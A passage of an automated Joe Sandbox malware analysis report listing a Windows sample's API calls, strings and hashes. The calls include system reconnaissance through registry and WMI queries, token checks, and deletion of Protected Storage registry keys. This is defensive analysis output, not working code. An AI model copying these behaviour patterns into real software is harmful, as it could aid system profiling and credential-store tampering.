                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                • String ID: #32768$AfxOldWndProc423$ime
                                • API String ID: 3204395069-4034971020
                                • Opcode ID: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
                                • Instruction ID: c31b28fc186431055d90b645be9d6e60fd1338abb9f4e3e990662555ef10b02e
                                • Opcode Fuzzy Hash: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
                                • Instruction Fuzzy Hash: 7851A131504215ABDF11AF50DC48B9E3B75AF04362F14816BFD18E62A2DF789E44CB99
                                APIs
                                • RegOpenKeyExA.KERNEL32 ref: 00436BD0
                                • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00436C9B
                                • RegQueryValueExA.KERNEL32(?,CSDVersion,00000000,00000000,?,80000002), ref: 00436CBB
                                • RegQueryValueExA.KERNEL32(?,BuildLab,00000000,00000000,?,?), ref: 00436CDB
                                • RegQueryValueExA.KERNEL32(?,RegisteredOwner,00000000,00000000,?,?), ref: 00436CFB
                                • RegQueryValueExA.KERNEL32(?,RegisteredOrganization,00000000,00000000,?,00000000), ref: 00436D1B
                                • RegQueryValueExA.KERNEL32(?,ProductId,00000000,00000000,?,?), ref: 00436D3B
                                • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00436DE6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: QueryValue$CloseOpen
                                • String ID: BuildLab$CSDVersion$ProductId$ProductName$RegisteredOrganization$RegisteredOwner$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 1586453840-3514816458
                                • Opcode ID: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
                                • Instruction ID: e5fba20e6ff125bba2283bc3006cd0e19e9b6b9096beb30a0a4ca32c458e7ecf
                                • Opcode Fuzzy Hash: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
                                • Instruction Fuzzy Hash: 55718D71108741AFD724DF14CC55F9BB3E8EBC8714F008A2EB199971D1EBB4A509CB96
                                APIs
                                  • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                • GetParent.USER32(?), ref: 004570B5
                                • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004570D8
                                • GetWindowRect.USER32(?,?), ref: 004570F1
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00457104
                                • CopyRect.USER32(?,?), ref: 00457151
                                • CopyRect.USER32(?,?), ref: 0045715B
                                • GetWindowRect.USER32(00000000,?), ref: 00457164
                                  • Part of subcall function 0043D078: MonitorFromWindow.USER32(00000002,00000000), ref: 0043D08D
                                  • Part of subcall function 0043D0E3: GetMonitorInfoA.USER32(00000002,00000000), ref: 0043D0F8
                                • CopyRect.USER32(?,?), ref: 00457180
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
                                • String ID: ($@
                                • API String ID: 1450647913-1311469180
                                • Opcode ID: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
                                • Instruction ID: f9aac2a8b0235c18acd1f2551889d6b630a400b2f47a5db2de4d24cadace4ab8
                                • Opcode Fuzzy Hash: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
                                • Instruction Fuzzy Hash: 19519471904608AFCB10DBB8DC85EEEBBB9AF44311F144166F901F7281EA34EC098B68
                                APIs
                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 0040140A
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00401411
                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000), ref: 0040142A
                                • GetLastError.KERNEL32 ref: 00401430
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401455
                                • HeapAlloc.KERNEL32(00000000), ref: 0040145E
                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00401474
                                • GetLengthSid.ADVAPI32 ref: 00401481
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040148C
                                • HeapAlloc.KERNEL32(00000000), ref: 0040148F
                                • CopySid.ADVAPI32(00000000,00000000), ref: 004014A1
                                • GetProcessHeap.KERNEL32(00000000), ref: 004014B0
                                • HeapFree.KERNEL32(00000000), ref: 004014B3
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014C8
                                • HeapFree.KERNEL32(00000000), ref: 004014CB
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Heap$Process$Token$AllocFreeInformation$CopyCurrentErrorLastLengthOpen
                                • String ID:
                                • API String ID: 4067104921-0
                                • Opcode ID: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
                                • Instruction ID: be5dff9eabe861d766ec5fd4dd401e50df9c5d4daca625da32615f9425814a56
                                • Opcode Fuzzy Hash: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
                                • Instruction Fuzzy Hash: 92216771200305ABD720AB71EC89F6B77ACEB84B55F004439F944C6290EAB4DC45C7BA
                                APIs
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                • CoCreateInstance.OLE32 ref: 0042B6F9
                                • VariantInit.OLEAUT32(?), ref: 0042B835
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateErrorInitInstanceLastMessageOpenVariant
                                • String ID: Couldn't connect to service$Domain$Instantiation of IWbemLocator failed$NV Hostname$Query failed$SELECT * FROM Win32_ComputerSystem WHERE Name="$System\CurrentControlSet\Services\Tcpip\Parameters$WQL$root\cimv2
                                • API String ID: 3264900959-945420370
                                • Opcode ID: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
                                • Instruction ID: e19c71c077be67fb10b829806df480d9e94b8e638e4d3a62bd1a267aacc894f3
                                • Opcode Fuzzy Hash: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
                                • Instruction Fuzzy Hash: AFC191B02083809FD310DB69C885F6FB7E9AFC4318F544A1EF19987292D7789849CB5B
                                APIs
                                  • Part of subcall function 00401370: GetVersionExA.KERNEL32 ref: 004013AC
                                  • Part of subcall function 00401370: GetVersionExA.KERNEL32(?), ref: 004013BF
                                • SHDeleteKeyA.SHLWAPI(80000001,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DCC
                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DDD
                                • HeapFree.KERNEL32(00000000), ref: 00404DE4
                                  • Part of subcall function 004012E0: GetVersionExA.KERNEL32 ref: 0040131C
                                  • Part of subcall function 004012E0: GetVersionExA.KERNEL32(?), ref: 0040132F
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00404E12
                                • HeapFree.KERNEL32(00000000), ref: 00404E19
                                  • Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00040000,?), ref: 00401894
                                  • Part of subcall function 00401860: RegSetKeySecurity.ADVAPI32(?,00000004,?), ref: 004018AA
                                  • Part of subcall function 00401860: RegCloseKey.ADVAPI32(?), ref: 004018C9
                                  • Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004018E0
                                  • Part of subcall function 00401860: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0040190E
                                  • Part of subcall function 00401860: RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000105), ref: 0040194C
                                • GetUserNameA.ADVAPI32(?,?), ref: 00404E58
                                • SHDeleteKeyA.SHLWAPI(80000002,?,\Data\e161255a-37c3-11d2-bcaa-00c04fd929db,0000002A,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404EAD
                                Strings
                                • \e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404DA0
                                • Software\Microsoft\Protected Storage System Provider\, xrefs: 00404CFD, 00404E60
                                • \Data, xrefs: 00404D7B
                                • \Data\e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404E95
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: HeapVersion$DeleteFreeOpenProcess$CloseEnumInfoNameQuerySecurityUser
                                • String ID: Software\Microsoft\Protected Storage System Provider\$\Data$\Data\e161255a-37c3-11d2-bcaa-00c04fd929db$\e161255a-37c3-11d2-bcaa-00c04fd929db
                                • API String ID: 76489323-2944829630
                                • Opcode ID: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
                                • Instruction ID: 77fd4bca92202b6cf2dab01a516e43f9aa8c3c24651323e1d72e56862fef26ee
                                • Opcode Fuzzy Hash: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
                                • Instruction Fuzzy Hash: CE7180712043019FD314EF61C859FABB7A8FBC4744F04492DF545972E1EBB8A909CB9A
                                APIs
                                • __EH_prolog.LIBCMT ref: 00455F60
                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
                                • LoadResource.KERNEL32(?,00000000), ref: 00455FA0
                                  • Part of subcall function 00457843: UnhookWindowsHookEx.USER32(?), ref: 00457868
                                • LockResource.KERNEL32(00000000), ref: 00455FB2
                                • GetDesktopWindow.USER32 ref: 00455FDF
                                • IsWindowEnabled.USER32(00000000), ref: 00455FED
                                • EnableWindow.USER32(00000000,00000000), ref: 00455FFC
                                • EnableWindow.USER32(00000000,00000001), ref: 0045608B
                                • GetActiveWindow.USER32 ref: 00456096
                                • SetActiveWindow.USER32(00000000), ref: 004560A4
                                • FreeResource.KERNEL32(00000000), ref: 004560C0
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                • String ID:
                                • API String ID: 833315621-0
                                • Opcode ID: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
                                • Instruction ID: 2a4ce187d4919ba72b0d1d9773206bd8c7ff34da06ea6e71cf98739f74d54366
                                • Opcode Fuzzy Hash: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
                                • Instruction Fuzzy Hash: 09418331500705DBCF20AFA5D94976FBBB5AF0471AF50042FE902622E2DBB85949CB5A
                                APIs
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
                                • SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$Open
                                • String ID: ($)$0000$Default$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language
                                • API String ID: 1554988408-487650185
                                • Opcode ID: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
                                • Instruction ID: c4091e44bddb758ac13fe4f631b60d438c76e1330555841b1ac334d37b406dde
                                • Opcode Fuzzy Hash: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
                                • Instruction Fuzzy Hash: 49B1BF70204B418FD714CF28C885B9AB3E1BF99324F148B5DF8A98B2D5DB74E805CB96
                                APIs
                                • __EH_prolog.LIBCMT ref: 00458761
                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 00458779
                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004587D7
                                  • Part of subcall function 00457CE7: GetWindowRect.USER32(?,?), ref: 00457D0C
                                  • Part of subcall function 00457CE7: GetWindow.USER32(?,00000004), ref: 00457D29
                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00458807
                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 0045880F
                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00458816
                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 0045881D
                                  • Part of subcall function 00456D25: GetWindowRect.USER32(?,753BFA40), ref: 00456D31
                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00458871
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                • String ID: AfxOldWndProc423
                                • API String ID: 2397448395-1060338832
                                • Opcode ID: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
                                • Instruction ID: ca612bbd6e85d40e054d0ae89126da5a4b03999a9a8927983b9c67bc9c87c1df
                                • Opcode Fuzzy Hash: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
                                • Instruction Fuzzy Hash: 6D31A032800209BBCB01AFA5ED49DBF7B79EF49312F00042EF902B1162DB785914DB6A
                                APIs
                                • EnterCriticalSection.KERNEL32(004D90EC,76F90A60,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 0046077A
                                • GlobalAlloc.KERNEL32(00000002,00000040,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 004607CB
                                • GlobalHandle.KERNEL32(008408B8), ref: 004607D4
                                • GlobalUnlock.KERNEL32(00000000), ref: 004607DE
                                • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 004607F2
                                • GlobalHandle.KERNEL32(008408B8), ref: 00460804
                                • GlobalLock.KERNEL32(00000000), ref: 0046080B
                                • LeaveCriticalSection.KERNEL32(?,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60), ref: 00460814
                                • GlobalLock.KERNEL32(00000000), ref: 00460820
                                • LeaveCriticalSection.KERNEL32(?), ref: 00460868
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                • String ID:
                                • API String ID: 2667261700-0
                                • Opcode ID: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
                                • Instruction ID: 24ed6f489e8cae63526faeb7cf58e8366cea2fd9f1ea75441c28e41bb40b13db
                                • Opcode Fuzzy Hash: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
                                • Instruction Fuzzy Hash: 94317A70A00B04AFC720DF69C848A5BBBF9FF84345B00496EE456D3620EBB4FA44CB55
                                APIs
                                • __EH_prolog.LIBCMT ref: 00455D53
                                • GetSystemMetrics.USER32(0000002A), ref: 00455E17
                                • GlobalLock.KERNEL32(00000000), ref: 00455E82
                                • CreateDialogIndirectParamA.USER32(?,?,?,Function_000557E8,00000000), ref: 00455EB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                • String ID: MS Shell Dlg
                                • API String ID: 2364537584-76309092
                                • Opcode ID: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
                                • Instruction ID: 60737eb939981e1663e8655a045ed5a825c3ec766cbfdbfa92d2e0a2365db7d1
                                • Opcode Fuzzy Hash: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
                                • Instruction Fuzzy Hash: 6F51C131900605DFCB10EFA4C89A9FEBBB5EF44316F14456BF802A7292D7794E48CB99
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0043C549
                                • PtInRect.USER32(?,00000000,?), ref: 0043C556
                                • SendMessageA.USER32(?,000002A3,?,?), ref: 0043C582
                                • _TrackMouseEvent.COMCTL32 ref: 0043C5B2
                                • GetClientRect.USER32(?,?), ref: 0043C653
                                • PtInRect.USER32(?,00000000,?), ref: 0043C660
                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C6F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Rect$Client$CallEventMessageMouseProcSendTrackWindow
                                • String ID: (sM
                                • API String ID: 3515703253-3311458642
                                APIs
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042D0B4
                                • GetLogicalDrives.KERNEL32 ref: 0042D0B6
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042D129
                                • SendMessageA.USER32(?,00000151,?,-00000041), ref: 0042D13D
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042D188
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0042D19A
                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0042D1AB
                                Similarity
                                • API ID: MessageSend$DrivesLogical
                                • String ID: %c:\
                                • API String ID: 501861121-3142399695
                                APIs
                                • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
                                • PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
                                • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
                                • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3
                                Similarity
                                • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                • String ID: .CHM$.HLP$.INI
                                • API String ID: 2140653559-4017452060
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 0045BEAA
                                • GetSystemMetrics.USER32(0000000C), ref: 0045BEB1
